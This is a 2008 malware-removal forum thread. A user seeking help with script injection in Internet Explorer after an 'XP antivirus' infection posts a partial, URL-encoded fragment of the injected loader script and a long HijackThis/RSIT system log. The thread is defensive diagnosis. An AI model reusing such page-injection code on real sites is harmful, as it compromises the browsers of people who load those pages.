1. You are viewing our forum as a guest. For full access please Register. WindowsBBS.com is completely free, paid for by advertisers and donations.

xp antivirus ... i know i know!

Discussion in 'Malware and Virus Removal Archive' started by ynot2k, 2008/09/04.

  1. 2008/09/04
    ynot2k

    ynot2k Inactive Thread Starter

    Joined:
    2008/02/04
    Messages:
    21
    Likes Received:
    0
    So i manually removed XP antivirus from a machine in our network. Was able to remove it completely with the help of HJT. i ran Malwarebytes' Anti-Malware after removing it and turned up nothing.

    However, at this point the IE7 is pooched. it seems there is a rogue dll or something in there that is injecting downloaded web pages with some script code that is making it very difficult to use IE - rendering some pages useless. For the time being, i have switched the user to FFX, but as requested would love to restore IE7. I did do a reset in the advanced tab of internet options, but that didn't help. i updated to SP3 but that didn't help either. at this point i am considering updating to IE8beta (and possibly back down to ie7) to see if that fixes it.

    I've gone through the list of Add-Ons and nothing looks fishy to me. Moreover, i would love to go into Add/Remove programs and uninstall ie7 & reinstall it, but that option is not there. As i am remote, i would also love to be able to fix this without going into recovery console as that would mean i would need to go on-site.

    Would downloading the IE7 distributable be a good idea?
    Any other suggestions? I am happy to post any current HJT logs and or random logs... Below is the comparison of a very simple web page and how the script is being injected.

    Thanks in advance.
    ynot2k

    ===== SIMPLE WEBPAGE RETURNED NORMALLY FROM A VIEW SOURCE OF NON-INFECTED MACHINE:
    Code:
    <HTML><HEAD><TITLE>Your IP</TITLE></HEAD><BODY bgcolor=#ffffff>
<FONT STYLE='font-family: arial; font-size: 10pt; font-weight: bold;'>Your IP address is: xxx.xxx.xxx.xxx<br />Current Time: Thursday, September 04, 2008 10:09:40 AM</FONT><P>
</BODY></HTML>
    ===== SAME VIEW SOURCE FROM INFECTED MACHINE (line breaks included):
    Code:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      0D%0Adocument.addEventListener%28%22DOMContentLoaded%22%2Ci%2Cfalse%29%3B%20%7D%20else%20if%28e%29%7B%20%20%20%20%20%28%0D%0Afunction%28%29%7Bvar%20t%3Ddocument.createElement%28%27doc%3Ardy%27%29%3Btry%7Bt.doScroll%28%27left%27%29%3B%0D%0Ai%28%29%3Bt%3Dnull%3B%7Dcatch%28e%29%7Bst%28arguments.callee%2C0%29%3B%7D%7D%29%28%29%3B%7Delse%7Bwindow.onload%3Di%3B%7D%7D%29%28init_b216dvsa6v%29%3B'))</script> <HTML><HEAD><TITLE>Your IP</TITLE></HEAD><BODY bgcolor=#ffffff>
<FONT STYLE='font-family: arial; font-size: 10pt; font-weight: bold;'>Your IP address is: 99.232.104.141<br />Current Time: Thursday, September 04, 2008 10:12:04 AM</FONT><P>
</BODY></HTML
     
    ynot2k,
    #1
  2. 2008/09/07
    noahdfear

    noahdfear Inactive

    Joined:
    2003/04/06
    Messages:
    12,178
    Likes Received:
    15
    Hi ynot2k,

    Lets see if anything turns up with another scanner.

    • Download RSIT by random/random and save it to your desktop.
    • Double click RSIT.exe to start the tool and click Continue at the disclaimer.
    • When the scan completes it will open a log named log.txt maximized, and a log named info.txt minimized.
    • Please post the contents of log.txt here in your next reply.
     
    noahdfear,
    #2


  3. to hide this advert.

  4. 2008/09/08
    ynot2k

    ynot2k Inactive Thread Starter

    Joined:
    2008/02/04
    Messages:
    21
    Likes Received:
    0
    hi noahdfear:

    thanks for your help. below is the result of the rsit run. note that i have blocked out ip addresses and anything related to user and/or company details. but all it really does is affect the path names as far as i can tell.

    thanks for any insight you can provide. cheers, ynot2k

    ---

    Logfile of random's system information tool (written by random/random)
    Run by xxxxxx at 2008-09-08 16:49:08
    Microsoft Windows XP Professional Service Pack 3
    System drive C: has 33 GB (42%) free of 78 GB
    Total RAM: 1983 MB (63% free)

    Logfile of Trend Micro HijackThis v2.0.2
    Scan saved at 4:49:11 PM, on 08/09/2008
    Platform: Windows XP SP3 (WinNT 5.01.2600)
    MSIE: Internet Explorer v7.00 (7.00.6000.16705)
    Boot mode: Normal

    Running processes:
    C:\WINDOWS\System32\smss.exe
    C:\WINDOWS\system32\winlogon.exe
    C:\WINDOWS\system32\services.exe
    C:\WINDOWS\system32\lsass.exe
    C:\WINDOWS\system32\svchost.exe
    C:\WINDOWS\System32\svchost.exe
    C:\WINDOWS\system32\spoolsv.exe
    C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
    C:\Program Files\Bonjour\mDNSResponder.exe
    C:\WINDOWS\system32\nvsvc32.exe
    C:\WINDOWS\system32\svchost.exe
    C:\Program Files\Smith Micro\StuffIt11\ArcNameService.exe
    C:\Program Files\RealVNC\VNC4\WinVNC4.exe
    C:\Program Files\Canon\CAL\CALMAIN.exe
    C:\WINDOWS\Explorer.EXE
    C:\WINDOWS\RTHDCPL.EXE
    C:\Program Files\Common Files\Real\Update_OB\realsched.exe
    C:\Program Files\iTunes\iTunesHelper.exe
    C:\Program Files\Java\jre1.6.0_07\bin\jusched.exe
    C:\WINDOWS\system32\RUNDLL32.EXE
    C:\Program Files\Google\Google Talk\googletalk.exe
    C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
    C:\WINDOWS\system32\ctfmon.exe
    C:\Program Files\Common Files\InstallShield\UpdateService\ISUSPM.exe
    C:\Program Files\iPod\bin\iPodService.exe
    C:\Program Files\Microsoft Office\OFFICE11\OUTLOOK.EXE
    C:\Program Files\Adobe\Adobe Photoshop CS3\Photoshop.exe
    C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe
    C:\Program Files\Adobe\Adobe Illustrator CS3\Support Files\Contents\Windows\Illustrator.exe
    C:\Program Files\Internet Explorer\IEXPLORE.EXE
    C:\WINDOWS\system32\notepad.exe
    C:\Program Files\Internet Explorer\Iexplore.exe
    D:\Installation Media\RSIT.exe
    C:\Program Files\Trend Micro\HijackThis\xxxxxx.exe

    R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
    R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.[COMPANYDOMAIN].com/
    R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
    R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
    R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
    R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
    R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
    R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
    R1 - HKCU\Software\Microsoft\Internet Connection Wizard,ShellNext = http://[COMPANYDOMAIN].blogspot.com/2006/10/office-20-conference-san-francisco.html
    R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Windows Internet Explorer provided by [COMPANYNAME]
    R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local
    O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
    O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll
    O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar4.dll
    O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files\Google\GoogleToolbarNotifier\3.0.1225.9868\swg.dll
    O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar4.dll
    O4 - HKLM\..\Run: [High Definition Audio Property Page Shortcut] HDAShCut.exe
    O4 - HKLM\..\Run: [RTHDCPL] RTHDCPL.EXE
    O4 - HKLM\..\Run: [Alcmtr] ALCMTR.EXE
    O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Common Files\Real\Update_OB\realsched.exe" -osboot
    O4 - HKLM\..\Run: [Adobe_ID0EYTHM] C:\PROGRA~1\COMMON~1\Adobe\ADOBEV~1\Server\bin\VERSIO~2.EXE
    O4 - HKLM\..\Run: [ISUSPM Startup] C:\PROGRA~1\COMMON~1\INSTAL~1\UPDATE~1\ISUSPM.exe -startup
    O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
    O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe "
    O4 - HKLM\..\Run: [NBKeyScan] "C:\Program Files\Nero\Nero8\Nero BackItUp\NBKeyScan.exe "
    O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre1.6.0_07\bin\jusched.exe "
    O4 - HKLM\..\Run: [RoxWatchTray] "C:\Program Files\Common Files\Roxio Shared\9.0\SharedCOM\RoxWatchTray9.exe "
    O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
    O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
    O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\system32\NvMcTray.dll,NvTaskbarInit
    O4 - HKCU\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
    O4 - HKCU\..\Run: [googletalk] "C:\Program Files\Google\Google Talk\googletalk.exe" /autostart
    O4 - HKCU\..\Run: [swg] C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
    O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
    O4 - HKCU\..\Run: [ISUSPM] "C:\Program Files\Common Files\InstallShield\UpdateService\ISUSPM.exe" -scheduler
    O4 - HKUS\S-1-5-19\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'LOCAL SERVICE')
    O4 - HKUS\S-1-5-20\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'NETWORK SERVICE')
    O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM')
    O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')
    O4 - Startup: Desktop Manager.lnk = C:\Program Files\Research In Motion\BlackBerry\DesktopMgr.exe
    O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
    O4 - Global Startup: QuickBooks Update Agent.lnk = C:\Program Files\Common Files\Intuit\QuickBooks\QBUpdate\qbupdate.exe
    O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll
    O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll
    O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL
    O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
    O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
    O15 - Trusted Zone: *.[COMPANYDOMAIN]
    O16 - DPF: {48DD0448-9209-4F81-9F6D-D83562940134} (MySpace Uploader Control) - http://lads.myspace.com/upload/MySpaceUploader1006.cab
    O16 - DPF: {6E32070A-766D-4EE6-879C-DC1FA91D2FC3} (MUWebControl Class) - http://www.update.microsoft.com/mic...ls/en/x86/client/muweb_site.cab?1191431904018
    O16 - DPF: {6F750203-1362-4815-A476-88533DE61D0C} (Kodak Gallery Easy Upload Manager Class) - http://www.kodakgallery.ca/downloads/BUM/BUM_WIN_IE_2/axofupld.cab
    O16 - DPF: {F137B9BA-89EA-4B04-9C67-2074A9DF61FD} (Photo Upload Plugin Class) - http://blacks.pnimedia.com/upload/activex/v2_0_0_10/PCAXSetupv2.0.0.10.cab?
    O17 - HKLM\System\CCS\Services\Tcpip\Parameters: Domain = office.[COMPANYDOMAIN]
    O17 - HKLM\Software\..\Telephony: DomainName = office.[COMPANYDOMAIN]
    O17 - HKLM\System\CCS\Services\Tcpip\..\{58A041D9-4CDA-4CB8-8254-D2BCA1054E2B}: NameServer = [name server ip addresses]
    O17 - HKLM\System\CS1\Services\Tcpip\Parameters: Domain = office.[COMPANYDOMAIN]
    O17 - HKLM\System\CS2\Services\Tcpip\Parameters: Domain = office.[COMPANYDOMAIN]
    O17 - HKLM\System\CS3\Services\Tcpip\Parameters: Domain = office.[COMPANYDOMAIN]
    O23 - Service: Adobe Version Cue CS3 - Adobe Systems Incorporated - C:\Program Files\Common Files\Adobe\Adobe Version Cue CS3\Server\bin\VersionCueCS3.exe
    O23 - Service: Apple Mobile Device - Apple, Inc. - C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
    O23 - Service: AVVBDB - Sysinternals - www.sysinternals.com - C:\DOCUME~1\[USER]~1.002\LOCALS~1\Temp\AVVBDB.exe
    O23 - Service: ##Id_String1.6844F930_1628_4223_B5CC_5BB94B879762## (Bonjour Service) - Apple Computer, Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
    O23 - Service: Canon Camera Access Library 8 (CCALib8) - Canon Inc. - C:\Program Files\Canon\CAL\CALMAIN.exe
    O23 - Service: FLEXnet Licensing Service - Macrovision Europe Ltd. - C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe
    O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
    O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe
    O23 - Service: iPod Service - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
    O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe
    O23 - Service: Roxio UPnP Renderer 9 - Sonic Solutions - C:\Program Files\Roxio\Digital Home 9\RoxioUPnPRenderer9.exe
    O23 - Service: Roxio Upnp Server 9 - Sonic Solutions - C:\Program Files\Roxio\Digital Home 9\RoxioUpnpService9.exe
    O23 - Service: LiveShare P2P Server 9 (RoxLiveShare9) - Sonic Solutions - C:\Program Files\Common Files\Roxio Shared\9.0\SharedCOM\RoxLiveShare9.exe
    O23 - Service: RoxMediaDB9 - Sonic Solutions - C:\Program Files\Common Files\Roxio Shared\9.0\SharedCOM\RoxMediaDB9.exe
    O23 - Service: Roxio Hard Drive Watcher 9 (RoxWatch9) - Sonic Solutions - C:\Program Files\Common Files\Roxio Shared\9.0\SharedCOM\RoxWatch9.exe
    O23 - Service: SiSoftware Database Agent Service (SandraDataSrv) - SiSoftware - C:\Program Files\SiSoftware\SiSoftware Sandra Lite XIb\Win32\RpcDataSrv.exe
    O23 - Service: SiSoftware Sandra Agent Service (SandraTheSrv) - SiSoftware - C:\Program Files\SiSoftware\SiSoftware Sandra Lite XIb\RpcSandraSrv.exe
    O23 - Service: Stuffit Archive Name Service - Smith Micro Software, Inc. - C:\Program Files\Smith Micro\StuffIt11\ArcNameService.exe
    O23 - Service: VNC Server Version 4 (WinVNC4) - RealVNC Ltd. - C:\Program Files\RealVNC\VNC4\WinVNC4.exe

    --
    End of file - 10292 bytes

    Scheduled tasks folder

    C:\WINDOWS\tasks\AppleSoftwareUpdate.job
    C:\WINDOWS\tasks\User_Feed_Synchronization-{CEEF0C1D-80B1-4558-8615-94BE1A901D7E}.job

    Registry dump

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3}]
    AcroIEHlprObj Class - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll [2004-12-14 63136]

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}]
    SSVHelper Class - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll [2008-06-10 509328]

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{AA58ED58-01DD-4d91-8333-CF10577473F7}]
    Google Toolbar Helper - c:\program files\google\googletoolbar4.dll [2007-01-20 2403392]

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{AF69DE43-7D58-4638-B6FA-CE66B5AD205D}]
    Google Toolbar Notifier BHO - C:\Program Files\Google\GoogleToolbarNotifier\3.0.1225.9868\swg.dll [2008-04-07 734704]

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar]
    {2318C2B1-4965-11d4-9B18-009027A5CD4F} - &Google - c:\program files\google\googletoolbar4.dll [2007-01-20 2403392]

    [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
    "High Definition Audio Property Page Shortcut "=C:\WINDOWS\system32\HDAShCut.exe [2005-01-07 61952]
    "RTHDCPL "=C:\WINDOWS\RTHDCPL.EXE [2005-07-12 14679552]
    "Alcmtr "=C:\WINDOWS\ALCMTR.EXE [2005-05-03 69632]
    "TkBellExe "=C:\Program Files\Common Files\Real\Update_OB\realsched.exe [2006-10-11 185784]
    "Adobe_ID0EYTHM "=C:\PROGRA~1\COMMON~1\Adobe\ADOBEV~1\Server\bin\VERSIO~2.EXE [2007-03-20 1884160]
    "ISUSPM Startup "=C:\PROGRA~1\COMMON~1\INSTAL~1\UPDATE~1\ISUSPM.exe [2006-09-11 218032]
    "QuickTime Task "=C:\Program Files\QuickTime\qttask.exe [2007-06-29 286720]
    "iTunesHelper "=C:\Program Files\iTunes\iTunesHelper.exe [2007-09-26 267064]
    "NBKeyScan "=C:\Program Files\Nero\Nero8\Nero BackItUp\NBKeyScan.exe []
    "SunJavaUpdateSched "=C:\Program Files\Java\jre1.6.0_07\bin\jusched.exe [2008-06-10 144784]
    "RoxWatchTray "=C:\Program Files\Common Files\Roxio Shared\9.0\SharedCOM\RoxWatchTray9.exe [2007-08-16 236016]
    "NvCplDaemon "=C:\WINDOWS\system32\NvCpl.dll [2005-12-10 7311360]
    "nwiz "=C:\WINDOWS\system32\nwiz.exe [2005-12-10 1519616]
    "NvMediaCenter "=C:\WINDOWS\system32\NvMcTray.dll [2005-12-10 86016]

    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
    "QuickTime Task "=C:\Program Files\QuickTime\qttask.exe [2007-06-29 286720]
    "googletalk "=C:\Program Files\Google\Google Talk\googletalk.exe [2007-01-01 3739648]
    "swg "=C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [2007-08-13 68856]
    "ctfmon.exe "=C:\WINDOWS\system32\ctfmon.exe [2008-04-13 15360]
    "ISUSPM "=C:\Program Files\Common Files\InstallShield\UpdateService\ISUSPM.exe [2006-09-11 218032]

    C:\Documents and Settings\All Users\Start Menu\Programs\Startup
    Adobe Reader Speed Launch.lnk - C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
    QuickBooks Update Agent.lnk - C:\Program Files\Common Files\Intuit\QuickBooks\QBUpdate\qbupdate.exe

    C:\Documents and Settings\[USER].[DOMAIN].002\Start Menu\Programs\Startup
    Desktop Manager.lnk - C:\Program Files\Research In Motion\BlackBerry\DesktopMgr.exe

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtiExtEvent]

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\WgaLogon]

    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\{1a3e09be-1e45-494b-9174-d7385b45bbf5}]

    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
    "NoDispBackgroundPage "=1
    "NoDispScrSavPage "=1

    [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System]
    "dontdisplaylastusername "=0
    "legalnoticecaption "=
    "legalnoticetext "=
    "shutdownwithoutlogon "=0
    "undockwithoutlogon "=1

    [HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list]
    "%windir%\system32\sessmgr.exe "= "%windir%\system32\sessmgr.exe:*:enabled:mad:xpsp2res.dll,-22019 "
    "C:\Program Files\Google\Google Talk\googletalk.exe "= "C:\Program Files\Google\Google Talk\googletalk.exe:*:Enabled:Google Talk "
    "C:\Program Files\iTunes\iTunes.exe "= "C:\Program Files\iTunes\iTunes.exe:*:Enabled:iTunes "
    "C:\Documents and Settings\[user]\Desktop\Leechftp.exe "= "C:\Documents and Settings\[user]\Desktop\Leechftp.exe:*:Enabled:LeechFTP "
    "C:\Program Files\SiSoftware\SiSoftware Sandra Lite XIb\RpcSandraSrv.exe "= "C:\Program Files\SiSoftware\SiSoftware Sandra Lite XIb\RpcSandraSrv.exe:*:Enabled:SiSoftware Sandra Agent Service "
    "%windir%\Network Diagnostic\xpnetdiag.exe "= "%windir%\Network Diagnostic\xpnetdiag.exe:*:Enabled:mad:xpsp3res.dll,-20000 "

    [HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\domainprofile\authorizedapplications\list]
    "C:\Program Files\RealVNC\VNC4\vncviewer.exe "= "C:\Program Files\RealVNC\VNC4\vncviewer.exe:*:Enabled:Run VNC Viewer "
    "C:\Program Files\Google\Google Talk\googletalk.exe "= "C:\Program Files\Google\Google Talk\googletalk.exe:*:Enabled:Google Talk "
    "C:\Program Files\Bonjour\mDNSResponder.exe "= "C:\Program Files\Bonjour\mDNSResponder.exe:*:Enabled:Bonjour "
    "C:\Program Files\Internet Explorer\IEXPLORE.EXE "= "C:\Program Files\Internet Explorer\IEXPLORE.EXE:*:Enabled:Internet Explorer "
    "C:\Documents and Settings\[USER].[DOMAIN].000\Desktop\Leechftp.exe "= "C:\Documents and Settings\[USER].[DOMAIN].000\Desktop\Leechftp.exe:*:Enabled:LeechFTP "
    "%windir%\Network Diagnostic\xpnetdiag.exe "= "%windir%\Network Diagnostic\xpnetdiag.exe:*:Enabled:mad:xpsp3res.dll,-20000 "
    "C:\WINDOWS\explorer.exe "= "C:\WINDOWS\explorer.exe:*:Enabled:Windows Explorer "
    "C:\Program Files\iTunes\iTunes.exe "= "C:\Program Files\iTunes\iTunes.exe:*:Enabled:iTunes "
    "C:\Program Files\Macromedia\Dreamweaver 8\Dreamweaver.exe "= "C:\Program Files\Macromedia\Dreamweaver 8\Dreamweaver.exe:*:Enabled:Dreamweaver 8 "
    "C:\WINDOWS\system32\sessmgr.exe "= "C:\WINDOWS\system32\sessmgr.exe:*:Disabled:mad:xpsp2res.dll,-22019 "
    "C:\Program Files\FTP Commander\ftpcomm.exe "= "C:\Program Files\FTP Commander\ftpcomm.exe:*:Enabled:ftpcomm "
    "C:\Program Files\SiSoftware\SiSoftware Sandra Lite XIb\RpcSandraSrv.exe "= "C:\Program Files\SiSoftware\SiSoftware Sandra Lite XIb\RpcSandraSrv.exe:*:Enabled:SiSoftware Sandra Agent Service "
    "C:\WINDOWS\system32\drivers\svchost.exe "= "C:\WINDOWS\system32\drivers\svchost.exe:*:Disabled:svchost "
    "%windir%\system32\sessmgr.exe "= "%windir%\system32\sessmgr.exe:*:enabled:mad:xpsp2res.dll,-22019 "

    [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{3fb0568b-c02e-11db-b87c-00148535f4e3}]
    shell\AutoRun\command - C:\WINDOWS\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL virgin.html


    File associations

    .js - edit - "C:\Program Files\Macromedia\Dreamweaver 8\dreamweaver.exe" "%1 "
    .js - open - "C:\Program Files\Adobe\Adobe Dreamweaver CS3\Dreamweaver.exe ", "%1 "

    List of files/folders created in the last three months

    2008-09-08 16:49:08 ----D---- C:\rsit
    2008-09-08 13:54:40 ----A---- C:\WINDOWS\system32\windows_update.exe
    2008-09-05 03:00:20 ----HDC---- C:\WINDOWS\$NtUninstallKB951978$
    2008-09-04 11:19:07 ----D---- C:\Documents and Settings\All Users\Application Data\nView_Profiles
    2008-09-03 16:30:41 ----D---- C:\Documents and Settings\[USER].[DOMAIN].002\Application Data\Malwarebytes
    2008-09-03 16:30:37 ----D---- C:\Program Files\Malwarebytes' Anti-Malware
    2008-09-03 16:30:37 ----D---- C:\Documents and Settings\All Users\Application Data\Malwarebytes
    2008-09-03 15:57:22 ----A---- C:\WINDOWS\system32\wmpns.dll
    2008-09-03 15:56:49 ----D---- C:\WINDOWS\Prefetch
    2008-09-03 15:53:19 ----HDC---- C:\WINDOWS\$NtUninstallKB952954$
    2008-09-03 15:53:14 ----HDC---- C:\WINDOWS\$NtUninstallKB952287$
    2008-09-03 15:53:08 ----HDC---- C:\WINDOWS\$NtUninstallKB951748$
    2008-09-03 15:53:04 ----HDC---- C:\WINDOWS\$NtUninstallKB951698$
    2008-09-03 15:52:59 ----HDC---- C:\WINDOWS\$NtUninstallKB951376-v2$
    2008-09-03 15:52:53 ----HDC---- C:\WINDOWS\$NtUninstallKB951066$
    2008-09-03 15:52:49 ----HDC---- C:\WINDOWS\$NtUninstallKB950974$
    2008-09-03 15:52:45 ----HDC---- C:\WINDOWS\$NtUninstallKB950762$
    2008-09-03 15:52:38 ----HDC---- C:\WINDOWS\$NtUninstallKB946648$
    2008-09-03 15:49:44 ----D---- C:\WINDOWS\system32\scripting
    2008-09-03 15:49:43 ----D---- C:\WINDOWS\system32\en
    2008-09-03 15:49:43 ----D---- C:\WINDOWS\system32\bits
    2008-09-03 15:49:43 ----D---- C:\WINDOWS\l2schemas
    2008-09-03 15:47:59 ----D---- C:\WINDOWS\ServicePackFiles
    2008-09-03 15:42:15 ----HDC---- C:\WINDOWS\$NtServicePackUninstall$
    2008-09-03 15:25:56 ----D---- C:\Program Files\Trend Micro
    2008-09-03 15:16:22 ----D---- C:\Documents and Settings\[USER].[DOMAIN].002\Application Data\rhc34lj0e5f1
    2008-08-29 11:38:20 ----N---- C:\WINDOWS\system32\wmphoto.dll
    2008-08-29 11:38:18 ----N---- C:\WINDOWS\system32\wlanapi.dll
    2008-08-29 11:38:18 ----N---- C:\WINDOWS\system32\windowscodecsext.dll
    2008-08-29 11:38:18 ----N---- C:\WINDOWS\system32\windowscodecs.dll
    2008-08-29 11:38:12 ----N---- C:\WINDOWS\system32\tspkg.dll
    2008-08-29 11:38:12 ----N---- C:\WINDOWS\system32\tsgqec.dll
    2008-08-29 11:38:08 ----N---- C:\WINDOWS\system32\spupdwxp.exe
    2008-08-29 11:38:08 ----A---- C:\WINDOWS\system32\spdwnwxp.exe
    2008-08-29 11:38:06 ----N---- C:\WINDOWS\system32\slserv.exe
    2008-08-29 11:38:06 ----N---- C:\WINDOWS\system32\slrundll.exe
    2008-08-29 11:38:06 ----N---- C:\WINDOWS\system32\slgen.dll
    2008-08-29 11:38:06 ----N---- C:\WINDOWS\system32\slextspk.dll
    2008-08-29 11:38:06 ----N---- C:\WINDOWS\system32\slcoinst.dll
    2008-08-29 11:38:06 ----N---- C:\WINDOWS\slrundll.exe
    2008-08-29 11:38:04 ----N---- C:\WINDOWS\system32\setupn.exe
    2008-08-29 11:38:03 ----N---- C:\WINDOWS\system32\s3gnb.dll
    2008-08-29 11:38:03 ----N---- C:\WINDOWS\system32\rhttpaa.dll
    2008-08-29 11:38:02 ----N---- C:\WINDOWS\system32\rasqec.dll
    2008-08-29 11:38:02 ----N---- C:\WINDOWS\system32\qutil.dll
    2008-08-29 11:38:02 ----N---- C:\WINDOWS\system32\qcliprov.dll
    2008-08-29 11:38:02 ----N---- C:\WINDOWS\system32\qagentrt.dll
    2008-08-29 11:38:02 ----N---- C:\WINDOWS\system32\qagent.dll
    2008-08-29 11:38:01 ----N---- C:\WINDOWS\system32\photometadatahandler.dll
    2008-08-29 11:38:00 ----N---- C:\WINDOWS\system32\onex.dll
    2008-08-29 11:37:58 ----N---- C:\WINDOWS\system32\napstat.exe
    2008-08-29 11:37:58 ----N---- C:\WINDOWS\system32\napmontr.dll
    2008-08-29 11:37:58 ----N---- C:\WINDOWS\system32\napipsec.dll
    2008-08-29 11:37:58 ----N---- C:\WINDOWS\system32\mtxparhd.dll
    2008-08-29 11:37:57 ----N---- C:\WINDOWS\system32\msshavmsg.dll
